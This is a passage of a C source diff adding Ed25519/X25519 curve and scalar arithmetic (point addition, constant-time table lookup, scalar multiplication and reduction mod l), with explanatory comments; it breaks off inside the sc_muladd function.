+// x25519_ge_add sets r = p + q for a cached |q|. Fields of |r| double as scratch.
+void x25519_ge_add(ge_p1p1 *r, const ge_p3 *p, const ge_cached *q) {
+  fe trX, trY, trZ, trT;
+  fe_add(&r->X, &p->Y, &p->X);  // r->X = Y + X (scratch)
+  fe_sub(&r->Y, &p->Y, &p->X);  // r->Y = Y - X (scratch)
+  fe_mul_tll(&trZ, &r->X, &q->YplusX);  // trZ = (Y + X) * q.YplusX
+  fe_mul_tll(&trY, &r->Y, &q->YminusX);  // trY = (Y - X) * q.YminusX
+  fe_mul_tlt(&trT, &q->T2d, &p->T);  // trT = q.T2d * T
+  fe_mul_ttl(&trX, &p->Z, &q->Z);  // trX = Z * q.Z
+  fe_add(&r->T, &trX, &trX);  // r->T = 2 * Z * q.Z (scratch)
+  fe_sub(&r->X, &trZ, &trY);
+  fe_add(&r->Y, &trZ, &trY);
+  fe_carry(&trZ, &r->T);  // trZ = 2 * Z * q.Z, made tight
+  fe_add(&r->Z, &trZ, &trT);
+  fe_sub(&r->T, &trZ, &trT);
+}
+// x25519_ge_sub sets r = p - q: |x25519_ge_add| with q's YplusX/YminusX roles and the trT signs swapped.
+void x25519_ge_sub(ge_p1p1 *r, const ge_p3 *p, const ge_cached *q) {
+  fe trX, trY, trZ, trT;
+  fe_add(&r->X, &p->Y, &p->X);  // r->X = Y + X (scratch)
+  fe_sub(&r->Y, &p->Y, &p->X);  // r->Y = Y - X (scratch)
+  fe_mul_tll(&trZ, &r->X, &q->YminusX);  // trZ = (Y + X) * q.YminusX
+  fe_mul_tll(&trY, &r->Y, &q->YplusX);  // trY = (Y - X) * q.YplusX
+  fe_mul_tlt(&trT, &q->T2d, &p->T);  // trT = q.T2d * T
+  fe_mul_ttl(&trX, &p->Z, &q->Z);  // trX = Z * q.Z
+  fe_add(&r->T, &trX, &trX);  // r->T = 2 * Z * q.Z (scratch)
+  fe_sub(&r->X, &trZ, &trY);
+  fe_add(&r->Y, &trZ, &trY);
+  fe_carry(&trZ, &r->T);  // trZ = 2 * Z * q.Z, made tight
+  fe_sub(&r->Z, &trZ, &trT);
+  fe_add(&r->T, &trZ, &trT);
+}
+// equal returns 1 if |b| == |c| and 0 otherwise, using arithmetic only.
+static uint8_t equal(signed char b, signed char c) {
+  // XOR of the two byte patterns: zero exactly when the inputs match.
+  const uint8_t diff = (uint8_t)b ^ (uint8_t)c;
+  // Widen and subtract one: only diff == 0 wraps around to 0xffffffff, so
+  // bit 31 of the result is set exactly when the inputs were equal.
+  const uint32_t wrapped = (uint32_t)diff - 1;
+  return (uint8_t)(wrapped >> 31);
+}
+static void cmov(ge_precomp *t, const ge_precomp *u, uint8_t b) {  // t = u if b == 1
+  fe_cmov(&t->yplusx, &u->yplusx, b);  // each field is selected separately via |fe_cmov|
+  fe_cmov(&t->yminusx, &u->yminusx, b);
+  fe_cmov(&t->xy2d, &u->xy2d, b);
+}
+void x25519_ge_scalarmult_small_precomp(
+    ge_p3 *h, const uint8_t a[32], const uint8_t precomp_table[15 * 2 * 32]) {
+  // precomp_table (15 entries of 32-byte x then 32-byte y) is first expanded
+  // into matching |ge_precomp| elements.
+  ge_precomp multiples[15];
+  unsigned i;
+  for (i = 0; i < 15; i++) {
+    // The precomputed table is assumed to already clear the top bit, so
+    // |fe_frombytes_strict| may be used directly.
+    const uint8_t *bytes = &precomp_table[i*(2 * 32)];
+    fe x, y;
+    fe_frombytes_strict(&x, bytes);
+    fe_frombytes_strict(&y, bytes + 32);
+    ge_precomp *out = &multiples[i];
+    fe_add(&out->yplusx, &y, &x);  // y + x
+    fe_sub(&out->yminusx, &y, &x);  // y - x
+    fe_mul_ltt(&out->xy2d, &x, &y);  // x * y ...
+    fe_mul_llt(&out->xy2d, &out->xy2d, &d2);  // ... times |d2|
+  }
+  // See the comment above |k25519SmallPrecomp| about the structure of the
+  // precomputed elements. This loop does 64 additions and 64 doublings to
+  // calculate the result.
+  ge_p3_0(h);
+  for (i = 63; i < 64; i--) {  // i is unsigned: decrementing past 0 wraps and ends the loop
+    unsigned j;
+    signed char index = 0;
+    for (j = 0; j < 4; j++) {  // bit j of |index| is bit (64 * j + i) of |a|
+      const uint8_t bit = 1 & (a[(8 * j) + (i / 8)] >> (i & 7));
+      index |= (bit << j);
+    }
+    ge_precomp e;
+    ge_precomp_0(&e);  // stays at this default when index == 0
+    for (j = 1; j < 16; j++) {  // scan every entry; keep multiples[index - 1]
+      cmov(&e, &multiples[j-1], equal(index, j));
+    }
+    ge_cached cached;
+    ge_p1p1 r;
+    x25519_ge_p3_to_cached(&cached, h);
+    x25519_ge_add(&r, h, &cached);  // h + h, i.e. the doubling step
+    x25519_ge_p1p1_to_p3(h, &r);
+    ge_madd(&r, h, &e);  // add the selected table entry
+    x25519_ge_p1p1_to_p3(h, &r);
+  }
+}
+#if defined(OPENSSL_SMALL)
+void x25519_ge_scalarmult_base(ge_p3 *h, const uint8_t a[32]) {  // OPENSSL_SMALL variant
+  x25519_ge_scalarmult_small_precomp(h, a, k25519SmallPrecomp);  // uses the small table
+}
+#else
+// negative returns 1 if |b| < 0 and 0 otherwise, using arithmetic only.
+static uint8_t negative(signed char b) {
+  // Converting to uint32_t sign-extends, so bit 31 mirrors the sign of |b|.
+  return (uint8_t)((uint32_t)b >> 31);
+}
+static void table_select(ge_precomp *t, int pos, signed char b) {  // t = entry |b| of row |pos|, sign applied
+  ge_precomp minust;
+  uint8_t bnegative = negative(b);
+  uint8_t babs = b - ((uint8_t)((-bnegative) & b) << 1);  // |b|, computed without a branch
+  ge_precomp_0(t);  // stays at this default when babs == 0
+  cmov(t, &k25519Precomp[pos][0], equal(babs, 1));  // all eight entries are scanned
+  cmov(t, &k25519Precomp[pos][1], equal(babs, 2));
+  cmov(t, &k25519Precomp[pos][2], equal(babs, 3));
+  cmov(t, &k25519Precomp[pos][3], equal(babs, 4));
+  cmov(t, &k25519Precomp[pos][4], equal(babs, 5));
+  cmov(t, &k25519Precomp[pos][5], equal(babs, 6));
+  cmov(t, &k25519Precomp[pos][6], equal(babs, 7));
+  cmov(t, &k25519Precomp[pos][7], equal(babs, 8));
+  fe_copy_ll(&minust.yplusx, &t->yminusx);  // minust swaps yplusx and yminusx ...
+  fe_copy_ll(&minust.yminusx, &t->yplusx);
+  // NOTE: the input table is canonical, but types don't encode it
+  fe tmp;
+  fe_carry(&tmp, &t->xy2d);
+  fe_neg(&minust.xy2d, &tmp);  // ... and negates xy2d
+  cmov(t, &minust, bnegative);  // take the swapped/negated entry when b < 0
+}
+// h = a * B
+// where a = a[0]+256*a[1]+...+256^31 a[31]
+// B is the Ed25519 base point (x,4/5) with x positive.
+//
+// Preconditions:
+//   a[31] <= 127
+void x25519_ge_scalarmult_base(ge_p3 *h, const uint8_t a[32]) {
+  signed char e[64];  // |a| as 64 radix-16 digits, least significant first
+  signed char carry;
+  ge_p1p1 r;
+  ge_p2 s;
+  ge_precomp t;
+  int i;
+  for (i = 0; i < 32; ++i) {
+    e[2 * i + 0] = (a[i] >> 0) & 15;  // low nibble
+    e[2 * i + 1] = (a[i] >> 4) & 15;  // high nibble
+  }
+  // each e[i] is between 0 and 15
+  // e[63] is between 0 and 7
+  carry = 0;
+  for (i = 0; i < 63; ++i) {  // recenter each digit, pushing a carry upward
+    e[i] += carry;
+    carry = e[i] + 8;
+    carry >>= 4;
+    e[i] -= carry << 4;
+  }
+  e[63] += carry;
+  // each e[i] is between -8 and 8
+  ge_p3_0(h);
+  for (i = 1; i < 64; i += 2) {  // first pass: odd-indexed digits
+    table_select(&t, i / 2, e[i]);
+    ge_madd(&r, h, &t);
+    x25519_ge_p1p1_to_p3(h, &r);
+  }
+  ge_p3_dbl(&r, h);  // four doublings in a row: h = 16 * h
+  x25519_ge_p1p1_to_p2(&s, &r);
+  ge_p2_dbl(&r, &s);
+  x25519_ge_p1p1_to_p2(&s, &r);
+  ge_p2_dbl(&r, &s);
+  x25519_ge_p1p1_to_p2(&s, &r);
+  ge_p2_dbl(&r, &s);
+  x25519_ge_p1p1_to_p3(h, &r);
+  for (i = 0; i < 64; i += 2) {  // second pass: even-indexed digits
+    table_select(&t, i / 2, e[i]);
+    ge_madd(&r, h, &t);
+    x25519_ge_p1p1_to_p3(h, &r);
+  }
+}
+#endif
+static void cmov_cached(ge_cached *t, ge_cached *u, uint8_t b) {  // t = u if b == 1
+  fe_cmov(&t->YplusX, &u->YplusX, b);  // each field is selected separately via |fe_cmov|
+  fe_cmov(&t->YminusX, &u->YminusX, b);
+  fe_cmov(&t->Z, &u->Z, b);
+  fe_cmov(&t->T2d, &u->T2d, b);
+}
+// r = scalar * A.
+// where a = a[0]+256*a[1]+...+256^31 a[31].
+void x25519_ge_scalarmult(ge_p2 *r, const uint8_t *scalar, const ge_p3 *A) {
+  ge_p2 Ai_p2[8];  // Ai_p2[k] = k * A for k = 1..7; index 0 is never written
+  ge_cached Ai[16];  // Ai[k] = k * A in cached form, for k = 0..15
+  ge_p1p1 t;
+  ge_cached_0(&Ai[0]);
+  x25519_ge_p3_to_cached(&Ai[1], A);
+  ge_p3_to_p2(&Ai_p2[1], A);
+  unsigned i;
+  for (i = 2; i < 16; i += 2) {  // fill the table two entries per iteration
+    ge_p2_dbl(&t, &Ai_p2[i / 2]);  // t = 2 * (i/2) * A = i * A
+    ge_p1p1_to_cached(&Ai[i], &t);
+    if (i < 8) {
+      x25519_ge_p1p1_to_p2(&Ai_p2[i], &t);
+    }
+    x25519_ge_add(&t, A, &Ai[i]);  // t = A + i * A = (i + 1) * A
+    ge_p1p1_to_cached(&Ai[i + 1], &t);
+    if (i < 7) {
+      x25519_ge_p1p1_to_p2(&Ai_p2[i + 1], &t);
+    }
+  }
+  ge_p2_0(r);
+  ge_p3 u;
+  for (i = 0; i < 256; i += 4) {  // one 4-bit window per iteration, top nibble first
+    ge_p2_dbl(&t, r);  // four doublings: u = 16 * r
+    x25519_ge_p1p1_to_p2(r, &t);
+    ge_p2_dbl(&t, r);
+    x25519_ge_p1p1_to_p2(r, &t);
+    ge_p2_dbl(&t, r);
+    x25519_ge_p1p1_to_p2(r, &t);
+    ge_p2_dbl(&t, r);
+    x25519_ge_p1p1_to_p3(&u, &t);
+    uint8_t index = scalar[31 - i/8];  // bytes are consumed from scalar[31] down
+    index >>= 4 - (i & 4);  // high nibble when i % 8 == 0, low nibble otherwise
+    index &= 0xf;
+    unsigned j;
+    ge_cached selected;
+    ge_cached_0(&selected);
+    for (j = 0; j < 16; j++) {  // scan every entry; keep Ai[index]
+      cmov_cached(&selected, &Ai[j], equal(j, index));
+    }
+    x25519_ge_add(&t, &u, &selected);  // r = 16 * r + index * A
+    x25519_ge_p1p1_to_p2(r, &t);
+  }
+}
+static void slide(signed char *r, const uint8_t *a) {  // recode the 256 bits of |a| into signed digits r[0..255]
+  int i;
+  int b;
+  int k;
+  for (i = 0; i < 256; ++i) {
+    r[i] = 1 & (a[i >> 3] >> (i & 7));  // start with r[i] = bit i of |a|
+  }
+  for (i = 0; i < 256; ++i) {
+    if (r[i]) {
+      for (b = 1; b <= 6 && i + b < 256; ++b) {  // look at up to six higher positions
+        if (r[i + b]) {
+          if (r[i] + (r[i + b] << b) <= 15) {  // absorb the higher bit while the digit stays <= 15
+            r[i] += r[i + b] << b;
+            r[i + b] = 0;
+          } else if (r[i] - (r[i + b] << b) >= -15) {  // else subtract it and carry 1 upward
+            r[i] -= r[i + b] << b;
+            for (k = i + b; k < 256; ++k) {  // ripple the carry to the first zero digit
+              if (!r[k]) {
+                r[k] = 1;
+                break;
+              }
+              r[k] = 0;
+            }
+          } else {
+            break;  // neither option keeps the digit within [-15, 15]
+          }
+        }
+      }
+    }
+  }
+}
+// r = a * A + b * B (control flow and table indices depend on the scalars)
+// where a = a[0]+256*a[1]+...+256^31 a[31].
+// and b = b[0]+256*b[1]+...+256^31 b[31].
+// B is the Ed25519 base point (x,4/5) with x positive.
+static void ge_double_scalarmult_vartime(ge_p2 *r, const uint8_t *a,
+                                         const ge_p3 *A, const uint8_t *b) {
+  signed char aslide[256];  // signed-digit recoding of |a| from |slide|
+  signed char bslide[256];  // signed-digit recoding of |b| from |slide|
+  ge_cached Ai[8];  // A,3A,5A,7A,9A,11A,13A,15A
+  ge_p1p1 t;
+  ge_p3 u;
+  ge_p3 A2;
+  int i;
+  slide(aslide, a);
+  slide(bslide, b);
+  x25519_ge_p3_to_cached(&Ai[0], A);
+  ge_p3_dbl(&t, A);
+  x25519_ge_p1p1_to_p3(&A2, &t);  // A2 = 2A
+  x25519_ge_add(&t, &A2, &Ai[0]);  // each further entry is the previous one plus 2A
+  x25519_ge_p1p1_to_p3(&u, &t);
+  x25519_ge_p3_to_cached(&Ai[1], &u);
+  x25519_ge_add(&t, &A2, &Ai[1]);
+  x25519_ge_p1p1_to_p3(&u, &t);
+  x25519_ge_p3_to_cached(&Ai[2], &u);
+  x25519_ge_add(&t, &A2, &Ai[2]);
+  x25519_ge_p1p1_to_p3(&u, &t);
+  x25519_ge_p3_to_cached(&Ai[3], &u);
+  x25519_ge_add(&t, &A2, &Ai[3]);
+  x25519_ge_p1p1_to_p3(&u, &t);
+  x25519_ge_p3_to_cached(&Ai[4], &u);
+  x25519_ge_add(&t, &A2, &Ai[4]);
+  x25519_ge_p1p1_to_p3(&u, &t);
+  x25519_ge_p3_to_cached(&Ai[5], &u);
+  x25519_ge_add(&t, &A2, &Ai[5]);
+  x25519_ge_p1p1_to_p3(&u, &t);
+  x25519_ge_p3_to_cached(&Ai[6], &u);
+  x25519_ge_add(&t, &A2, &Ai[6]);
+  x25519_ge_p1p1_to_p3(&u, &t);
+  x25519_ge_p3_to_cached(&Ai[7], &u);
+  ge_p2_0(r);
+  for (i = 255; i >= 0; --i) {  // skip leading positions where both digits are zero
+    if (aslide[i] || bslide[i]) {
+      break;
+    }
+  }
+  for (; i >= 0; --i) {  // double, then add or subtract per the digits at position i
+    ge_p2_dbl(&t, r);
+    if (aslide[i] > 0) {
+      x25519_ge_p1p1_to_p3(&u, &t);
+      x25519_ge_add(&t, &u, &Ai[aslide[i] / 2]);  // digit d selects Ai[d / 2]
+    } else if (aslide[i] < 0) {
+      x25519_ge_p1p1_to_p3(&u, &t);
+      x25519_ge_sub(&t, &u, &Ai[(-aslide[i]) / 2]);
+    }
+    if (bslide[i] > 0) {
+      x25519_ge_p1p1_to_p3(&u, &t);
+      ge_madd(&t, &u, &Bi[bslide[i] / 2]);  // |Bi| is defined outside this function
+    } else if (bslide[i] < 0) {
+      x25519_ge_p1p1_to_p3(&u, &t);
+      ge_msub(&t, &u, &Bi[(-bslide[i]) / 2]);
+    }
+    x25519_ge_p1p1_to_p2(r, &t);
+  }
+}
+// int64_lshift21 returns |a << 21| but is defined when shifting bits into the
+// sign bit: the shift runs on the unsigned bit pattern, then converts back.
+static inline int64_t int64_lshift21(int64_t a) {
+  return (int64_t)((uint64_t)a << 21);
+}
+// The set of scalars is \Z/l
+// where l = 2^252 + 27742317777372353535851937790883648493.
+// Input:
+//   s[0]+256*s[1]+...+256^63*s[63] = s
+//
+// Output:
+//   s[0]+256*s[1]+...+256^31*s[31] = s mod l
+//   where l = 2^252 + 27742317777372353535851937790883648493.
+//   Overwrites s in place.
+void x25519_sc_reduce(uint8_t s[64]) {  // unpacks s into 24 limbs, folds limbs 12..23 down, writes s[0..31]
+  int64_t s0 = 2097151 & load_3(s);  // 2097151 = 2^21 - 1: every limb except s23 is masked to 21 bits
+  int64_t s1 = 2097151 & (load_4(s + 2) >> 5);  // load_3/load_4 are defined elsewhere; presumably 3-/4-byte little-endian loads
+  int64_t s2 = 2097151 & (load_3(s + 5) >> 2);
+  int64_t s3 = 2097151 & (load_4(s + 7) >> 7);
+  int64_t s4 = 2097151 & (load_4(s + 10) >> 4);
+  int64_t s5 = 2097151 & (load_3(s + 13) >> 1);
+  int64_t s6 = 2097151 & (load_4(s + 15) >> 6);
+  int64_t s7 = 2097151 & (load_3(s + 18) >> 3);
+  int64_t s8 = 2097151 & load_3(s + 21);
+  int64_t s9 = 2097151 & (load_4(s + 23) >> 5);
+  int64_t s10 = 2097151 & (load_3(s + 26) >> 2);
+  int64_t s11 = 2097151 & (load_4(s + 28) >> 7);
+  int64_t s12 = 2097151 & (load_4(s + 31) >> 4);
+  int64_t s13 = 2097151 & (load_3(s + 34) >> 1);
+  int64_t s14 = 2097151 & (load_4(s + 36) >> 6);
+  int64_t s15 = 2097151 & (load_3(s + 39) >> 3);
+  int64_t s16 = 2097151 & load_3(s + 42);
+  int64_t s17 = 2097151 & (load_4(s + 44) >> 5);
+  int64_t s18 = 2097151 & (load_3(s + 47) >> 2);
+  int64_t s19 = 2097151 & (load_4(s + 49) >> 7);
+  int64_t s20 = 2097151 & (load_4(s + 52) >> 4);
+  int64_t s21 = 2097151 & (load_3(s + 55) >> 1);
+  int64_t s22 = 2097151 & (load_4(s + 57) >> 6);
+  int64_t s23 = (load_4(s + 60) >> 3);  // top limb: shifted but left unmasked
+  int64_t carry0;
+  int64_t carry1;
+  int64_t carry2;
+  int64_t carry3;
+  int64_t carry4;
+  int64_t carry5;
+  int64_t carry6;
+  int64_t carry7;
+  int64_t carry8;
+  int64_t carry9;
+  int64_t carry10;
+  int64_t carry11;
+  int64_t carry12;
+  int64_t carry13;
+  int64_t carry14;
+  int64_t carry15;
+  int64_t carry16;
+  s11 += s23 * 666643;  // fold s23 into s11..s16 using six fixed multipliers, then zero it
+  s12 += s23 * 470296;
+  s13 += s23 * 654183;
+  s14 -= s23 * 997805;
+  s15 += s23 * 136657;
+  s16 -= s23 * 683901;
+  s23 = 0;
+  s10 += s22 * 666643;  // same fold for s22, and below for s21 down to s18
+  s11 += s22 * 470296;
+  s12 += s22 * 654183;
+  s13 -= s22 * 997805;
+  s14 += s22 * 136657;
+  s15 -= s22 * 683901;
+  s22 = 0;
+  s9 += s21 * 666643;
+  s10 += s21 * 470296;
+  s11 += s21 * 654183;
+  s12 -= s21 * 997805;
+  s13 += s21 * 136657;
+  s14 -= s21 * 683901;
+  s21 = 0;
+  s8 += s20 * 666643;
+  s9 += s20 * 470296;
+  s10 += s20 * 654183;
+  s11 -= s20 * 997805;
+  s12 += s20 * 136657;
+  s13 -= s20 * 683901;
+  s20 = 0;
+  s7 += s19 * 666643;
+  s8 += s19 * 470296;
+  s9 += s19 * 654183;
+  s10 -= s19 * 997805;
+  s11 += s19 * 136657;
+  s12 -= s19 * 683901;
+  s19 = 0;
+  s6 += s18 * 666643;
+  s7 += s18 * 470296;
+  s8 += s18 * 654183;
+  s9 -= s18 * 997805;
+  s10 += s18 * 136657;
+  s11 -= s18 * 683901;
+  s18 = 0;
+  carry6 = (s6 + (1 << 20)) >> 21;  // rounded carry: add 2^20, shift right by 21; even limbs s6..s16 first
+  s7 += carry6;
+  s6 -= int64_lshift21(carry6);  // int64_lshift21 is defined elsewhere; presumably carry << 21 — confirm
+  carry8 = (s8 + (1 << 20)) >> 21;
+  s9 += carry8;
+  s8 -= int64_lshift21(carry8);
+  carry10 = (s10 + (1 << 20)) >> 21;
+  s11 += carry10;
+  s10 -= int64_lshift21(carry10);
+  carry12 = (s12 + (1 << 20)) >> 21;
+  s13 += carry12;
+  s12 -= int64_lshift21(carry12);
+  carry14 = (s14 + (1 << 20)) >> 21;
+  s15 += carry14;
+  s14 -= int64_lshift21(carry14);
+  carry16 = (s16 + (1 << 20)) >> 21;
+  s17 += carry16;
+  s16 -= int64_lshift21(carry16);
+  carry7 = (s7 + (1 << 20)) >> 21;  // then the odd limbs s7..s15
+  s8 += carry7;
+  s7 -= int64_lshift21(carry7);
+  carry9 = (s9 + (1 << 20)) >> 21;
+  s10 += carry9;
+  s9 -= int64_lshift21(carry9);
+  carry11 = (s11 + (1 << 20)) >> 21;
+  s12 += carry11;
+  s11 -= int64_lshift21(carry11);
+  carry13 = (s13 + (1 << 20)) >> 21;
+  s14 += carry13;
+  s13 -= int64_lshift21(carry13);
+  carry15 = (s15 + (1 << 20)) >> 21;
+  s16 += carry15;
+  s15 -= int64_lshift21(carry15);
+  s5 += s17 * 666643;  // second fold pass: s17 down to s12, each into the six limbs starting 12 positions lower
+  s6 += s17 * 470296;
+  s7 += s17 * 654183;
+  s8 -= s17 * 997805;
+  s9 += s17 * 136657;
+  s10 -= s17 * 683901;
+  s17 = 0;
+  s4 += s16 * 666643;
+  s5 += s16 * 470296;
+  s6 += s16 * 654183;
+  s7 -= s16 * 997805;
+  s8 += s16 * 136657;
+  s9 -= s16 * 683901;
+  s16 = 0;
+  s3 += s15 * 666643;
+  s4 += s15 * 470296;
+  s5 += s15 * 654183;
+  s6 -= s15 * 997805;
+  s7 += s15 * 136657;
+  s8 -= s15 * 683901;
+  s15 = 0;
+  s2 += s14 * 666643;
+  s3 += s14 * 470296;
+  s4 += s14 * 654183;
+  s5 -= s14 * 997805;
+  s6 += s14 * 136657;
+  s7 -= s14 * 683901;
+  s14 = 0;
+  s1 += s13 * 666643;
+  s2 += s13 * 470296;
+  s3 += s13 * 654183;
+  s4 -= s13 * 997805;
+  s5 += s13 * 136657;
+  s6 -= s13 * 683901;
+  s13 = 0;
+  s0 += s12 * 666643;
+  s1 += s12 * 470296;
+  s2 += s12 * 654183;
+  s3 -= s12 * 997805;
+  s4 += s12 * 136657;
+  s5 -= s12 * 683901;
+  s12 = 0;
+  carry0 = (s0 + (1 << 20)) >> 21;  // rounded carries again: even limbs s0..s10, then odd limbs s1..s11
+  s1 += carry0;
+  s0 -= int64_lshift21(carry0);
+  carry2 = (s2 + (1 << 20)) >> 21;
+  s3 += carry2;
+  s2 -= int64_lshift21(carry2);
+  carry4 = (s4 + (1 << 20)) >> 21;
+  s5 += carry4;
+  s4 -= int64_lshift21(carry4);
+  carry6 = (s6 + (1 << 20)) >> 21;
+  s7 += carry6;
+  s6 -= int64_lshift21(carry6);
+  carry8 = (s8 + (1 << 20)) >> 21;
+  s9 += carry8;
+  s8 -= int64_lshift21(carry8);
+  carry10 = (s10 + (1 << 20)) >> 21;
+  s11 += carry10;
+  s10 -= int64_lshift21(carry10);
+  carry1 = (s1 + (1 << 20)) >> 21;
+  s2 += carry1;
+  s1 -= int64_lshift21(carry1);
+  carry3 = (s3 + (1 << 20)) >> 21;
+  s4 += carry3;
+  s3 -= int64_lshift21(carry3);
+  carry5 = (s5 + (1 << 20)) >> 21;
+  s6 += carry5;
+  s5 -= int64_lshift21(carry5);
+  carry7 = (s7 + (1 << 20)) >> 21;
+  s8 += carry7;
+  s7 -= int64_lshift21(carry7);
+  carry9 = (s9 + (1 << 20)) >> 21;
+  s10 += carry9;
+  s9 -= int64_lshift21(carry9);
+  carry11 = (s11 + (1 << 20)) >> 21;
+  s12 += carry11;
+  s11 -= int64_lshift21(carry11);
+  s0 += s12 * 666643;  // s12 was zeroed above, so it now holds only carry11; fold it back in
+  s1 += s12 * 470296;
+  s2 += s12 * 654183;
+  s3 -= s12 * 997805;
+  s4 += s12 * 136657;
+  s5 -= s12 * 683901;
+  s12 = 0;
+  carry0 = s0 >> 21;  // from here the carries are plain >> 21 (no 2^20 term), rippling s0 up to s11
+  s1 += carry0;
+  s0 -= int64_lshift21(carry0);
+  carry1 = s1 >> 21;
+  s2 += carry1;
+  s1 -= int64_lshift21(carry1);
+  carry2 = s2 >> 21;
+  s3 += carry2;
+  s2 -= int64_lshift21(carry2);
+  carry3 = s3 >> 21;
+  s4 += carry3;
+  s3 -= int64_lshift21(carry3);
+  carry4 = s4 >> 21;
+  s5 += carry4;
+  s4 -= int64_lshift21(carry4);
+  carry5 = s5 >> 21;
+  s6 += carry5;
+  s5 -= int64_lshift21(carry5);
+  carry6 = s6 >> 21;
+  s7 += carry6;
+  s6 -= int64_lshift21(carry6);
+  carry7 = s7 >> 21;
+  s8 += carry7;
+  s7 -= int64_lshift21(carry7);
+  carry8 = s8 >> 21;
+  s9 += carry8;
+  s8 -= int64_lshift21(carry8);
+  carry9 = s9 >> 21;
+  s10 += carry9;
+  s9 -= int64_lshift21(carry9);
+  carry10 = s10 >> 21;
+  s11 += carry10;
+  s10 -= int64_lshift21(carry10);
+  carry11 = s11 >> 21;
+  s12 += carry11;
+  s11 -= int64_lshift21(carry11);
+  s0 += s12 * 666643;  // fold the carry out of s11 one last time
+  s1 += s12 * 470296;
+  s2 += s12 * 654183;
+  s3 -= s12 * 997805;
+  s4 += s12 * 136657;
+  s5 -= s12 * 683901;
+  s12 = 0;
+  carry0 = s0 >> 21;  // final ripple s0..s10; no carry is taken out of s11 this time
+  s1 += carry0;
+  s0 -= int64_lshift21(carry0);
+  carry1 = s1 >> 21;
+  s2 += carry1;
+  s1 -= int64_lshift21(carry1);
+  carry2 = s2 >> 21;
+  s3 += carry2;
+  s2 -= int64_lshift21(carry2);
+  carry3 = s3 >> 21;
+  s4 += carry3;
+  s3 -= int64_lshift21(carry3);
+  carry4 = s4 >> 21;
+  s5 += carry4;
+  s4 -= int64_lshift21(carry4);
+  carry5 = s5 >> 21;
+  s6 += carry5;
+  s5 -= int64_lshift21(carry5);
+  carry6 = s6 >> 21;
+  s7 += carry6;
+  s6 -= int64_lshift21(carry6);
+  carry7 = s7 >> 21;
+  s8 += carry7;
+  s7 -= int64_lshift21(carry7);
+  carry8 = s8 >> 21;
+  s9 += carry8;
+  s8 -= int64_lshift21(carry8);
+  carry9 = s9 >> 21;
+  s10 += carry9;
+  s9 -= int64_lshift21(carry9);
+  carry10 = s10 >> 21;
+  s11 += carry10;
+  s10 -= int64_lshift21(carry10);
+  s[0] = s0 >> 0;  // pack limbs s0..s11 back into bytes s[0..31]; s[32..63] are not written
+  s[1] = s0 >> 8;
+  s[2] = (s0 >> 16) | (s1 << 5);
+  s[3] = s1 >> 3;
+  s[4] = s1 >> 11;
+  s[5] = (s1 >> 19) | (s2 << 2);
+  s[6] = s2 >> 6;
+  s[7] = (s2 >> 14) | (s3 << 7);
+  s[8] = s3 >> 1;
+  s[9] = s3 >> 9;
+  s[10] = (s3 >> 17) | (s4 << 4);
+  s[11] = s4 >> 4;
+  s[12] = s4 >> 12;
+  s[13] = (s4 >> 20) | (s5 << 1);
+  s[14] = s5 >> 7;
+  s[15] = (s5 >> 15) | (s6 << 6);
+  s[16] = s6 >> 2;
+  s[17] = s6 >> 10;
+  s[18] = (s6 >> 18) | (s7 << 3);
+  s[19] = s7 >> 5;
+  s[20] = s7 >> 13;
+  s[21] = s8 >> 0;
+  s[22] = s8 >> 8;
+  s[23] = (s8 >> 16) | (s9 << 5);
+  s[24] = s9 >> 3;
+  s[25] = s9 >> 11;
+  s[26] = (s9 >> 19) | (s10 << 2);
+  s[27] = s10 >> 6;
+  s[28] = (s10 >> 14) | (s11 << 7);
+  s[29] = s11 >> 1;
+  s[30] = s11 >> 9;
+  s[31] = s11 >> 17;
+}
+// Input:
+//   a[0]+256*a[1]+...+256^31*a[31] = a
+//   b[0]+256*b[1]+...+256^31*b[31] = b
+//   c[0]+256*c[1]+...+256^31*c[31] = c
+//
+// Output:
+//   s[0]+256*s[1]+...+256^31*s[31] = (ab+c) mod l
+//   where l = 2^252 + 27742317777372353535851937790883648493.
+static void sc_muladd(uint8_t *s, const uint8_t *a, const uint8_t *b,
+                      const uint8_t *c) {  // s[0..31] = (a*b + c) reduced as described in the header comment
+  int64_t a0 = 2097151 & load_3(a);  // 2097151 = 2^21 - 1: a, b and c are each split into twelve limbs
+  int64_t a1 = 2097151 & (load_4(a + 2) >> 5);  // load_3/load_4 are defined elsewhere; presumably 3-/4-byte little-endian loads
+  int64_t a2 = 2097151 & (load_3(a + 5) >> 2);
+  int64_t a3 = 2097151 & (load_4(a + 7) >> 7);
+  int64_t a4 = 2097151 & (load_4(a + 10) >> 4);
+  int64_t a5 = 2097151 & (load_3(a + 13) >> 1);
+  int64_t a6 = 2097151 & (load_4(a + 15) >> 6);
+  int64_t a7 = 2097151 & (load_3(a + 18) >> 3);
+  int64_t a8 = 2097151 & load_3(a + 21);
+  int64_t a9 = 2097151 & (load_4(a + 23) >> 5);
+  int64_t a10 = 2097151 & (load_3(a + 26) >> 2);
+  int64_t a11 = (load_4(a + 28) >> 7);  // top limb of each operand is shifted but left unmasked
+  int64_t b0 = 2097151 & load_3(b);
+  int64_t b1 = 2097151 & (load_4(b + 2) >> 5);
+  int64_t b2 = 2097151 & (load_3(b + 5) >> 2);
+  int64_t b3 = 2097151 & (load_4(b + 7) >> 7);
+  int64_t b4 = 2097151 & (load_4(b + 10) >> 4);
+  int64_t b5 = 2097151 & (load_3(b + 13) >> 1);
+  int64_t b6 = 2097151 & (load_4(b + 15) >> 6);
+  int64_t b7 = 2097151 & (load_3(b + 18) >> 3);
+  int64_t b8 = 2097151 & load_3(b + 21);
+  int64_t b9 = 2097151 & (load_4(b + 23) >> 5);
+  int64_t b10 = 2097151 & (load_3(b + 26) >> 2);
+  int64_t b11 = (load_4(b + 28) >> 7);
+  int64_t c0 = 2097151 & load_3(c);
+  int64_t c1 = 2097151 & (load_4(c + 2) >> 5);
+  int64_t c2 = 2097151 & (load_3(c + 5) >> 2);
+  int64_t c3 = 2097151 & (load_4(c + 7) >> 7);
+  int64_t c4 = 2097151 & (load_4(c + 10) >> 4);
+  int64_t c5 = 2097151 & (load_3(c + 13) >> 1);
+  int64_t c6 = 2097151 & (load_4(c + 15) >> 6);
+  int64_t c7 = 2097151 & (load_3(c + 18) >> 3);
+  int64_t c8 = 2097151 & load_3(c + 21);
+  int64_t c9 = 2097151 & (load_4(c + 23) >> 5);
+  int64_t c10 = 2097151 & (load_3(c + 26) >> 2);
+  int64_t c11 = (load_4(c + 28) >> 7);
+  int64_t s0;
+  int64_t s1;
+  int64_t s2;
+  int64_t s3;
+  int64_t s4;
+  int64_t s5;
+  int64_t s6;
